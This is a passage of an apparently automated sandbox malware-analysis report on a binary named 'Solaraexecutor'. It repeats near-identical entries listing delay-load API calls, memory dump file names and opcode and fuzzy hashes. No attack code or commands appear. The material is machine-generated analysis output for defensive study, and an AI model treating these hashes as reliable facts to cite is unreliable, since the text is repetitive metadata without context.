                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 0c08dfcba3518b1c6f3fef99ea140d6dc6f47689d35e9766cc8b906f8845c471
                                                      • Instruction ID: fe47faaacb73251a8421d30b52c0291669002cedc65c17f152c7b3583fe58644
                                                      • Opcode Fuzzy Hash: 0c08dfcba3518b1c6f3fef99ea140d6dc6f47689d35e9766cc8b906f8845c471
                                                      • Instruction Fuzzy Hash: 25B012C1668100BC350421241C06C3B030CC0C1F15B30503EFC64C04C1A8404E4C0471
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 06de44a3ea9f287733301b2ef670de457328c8d1f8b0a601b0257ed230420ea0
                                                      • Instruction ID: e9265229b51ee1c0b7587155ab00446dc3d3004e43a4fdb78d517cf298f51a60
                                                      • Opcode Fuzzy Hash: 06de44a3ea9f287733301b2ef670de457328c8d1f8b0a601b0257ed230420ea0
                                                      • Instruction Fuzzy Hash: 5AB012C1668100BE350461091C02D3B030CC0C1F15730502EFC18C01C0E8404D480571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 5c0aefd8e6f30fae85531787ecf5777c7bcf0f551c1bd63fedbb1e6e8f9e7a3d
                                                      • Instruction ID: bb95fb74185c7677f0ea6bc0dba28a428071af8618254e908b4b4fc40859b8ea
                                                      • Opcode Fuzzy Hash: 5c0aefd8e6f30fae85531787ecf5777c7bcf0f551c1bd63fedbb1e6e8f9e7a3d
                                                      • Instruction Fuzzy Hash: 10B012C1668140BD350461091D02C3B070CC0C1F15730902EFC18C42C0E8404D490571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: c3ca8237eae03e8333c9c1e2f8721e1c652433f489f277e691aaa5471c450404
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: c3ca8237eae03e8333c9c1e2f8721e1c652433f489f277e691aaa5471c450404
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 22130a96ff640958c1652a5362255066d378daa1ba9cc7cce561f2b630c6b48a
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: 22130a96ff640958c1652a5362255066d378daa1ba9cc7cce561f2b630c6b48a
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 88a9be98720376daa688faa3060c4f323ce32eaa6b4697bca95418c3699e6589
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: 88a9be98720376daa688faa3060c4f323ce32eaa6b4697bca95418c3699e6589
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 2813bd2fa2ffb5c62810269732d7b48c49f8ce8b919e7dd3a081b0a76c2d1041
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: 2813bd2fa2ffb5c62810269732d7b48c49f8ce8b919e7dd3a081b0a76c2d1041
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: f7ca3aeb0906809b05647c7cc570bf002abff4fc068c2bce6d9b4f6b0c284cf3
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: f7ca3aeb0906809b05647c7cc570bf002abff4fc068c2bce6d9b4f6b0c284cf3
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 8ecad677173f297c4b0aae917fdfbbbdddde2aa7bf3dc7eb21c2cd4a0532e6e3
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: 8ecad677173f297c4b0aae917fdfbbbdddde2aa7bf3dc7eb21c2cd4a0532e6e3
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: f734a7a0d6bea59c507d1ee94a43a2065de158679d73a9bd01666573f29a3ff8
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: f734a7a0d6bea59c507d1ee94a43a2065de158679d73a9bd01666573f29a3ff8
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 0a3404f94c38de87a761fc40d8ee05ce1cdcf1b7903b9fa12eaf17e5cc2260bb
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: 0a3404f94c38de87a761fc40d8ee05ce1cdcf1b7903b9fa12eaf17e5cc2260bb
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 2dd3283bec9a2a5aed96bbc8e7beb324f1d96dc1d5f580ef1b23a4803a4b118a
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: 2dd3283bec9a2a5aed96bbc8e7beb324f1d96dc1d5f580ef1b23a4803a4b118a
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 6113edc4c91e6d301e3ab93daea29f571644706e9e8ed3a8b13af841b1a0ff78
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: 6113edc4c91e6d301e3ab93daea29f571644706e9e8ed3a8b13af841b1a0ff78
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: c78cd18a2865265e5beb2f70dd4c8c1e9925fd078c4f6a5cea10c520a2651bb9
                                                      • Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
                                                      • Opcode Fuzzy Hash: c78cd18a2865265e5beb2f70dd4c8c1e9925fd078c4f6a5cea10c520a2651bb9
                                                      • Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 8cbb4289603ab51f602b0f50656376df0f9fbd30c35fae66d0ef60c782c7129e
                                                      • Instruction ID: d94a08356b622340ebacc20e0d291d4d72d8b1d98c69a20aac2cb1664cf93f4b
                                                      • Opcode Fuzzy Hash: 8cbb4289603ab51f602b0f50656376df0f9fbd30c35fae66d0ef60c782c7129e
                                                      • Instruction Fuzzy Hash: 31A001E66A9252BD350862516D16C3B435DC4C2B2BB30A52EFC65A54D1AC80594A18B2
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
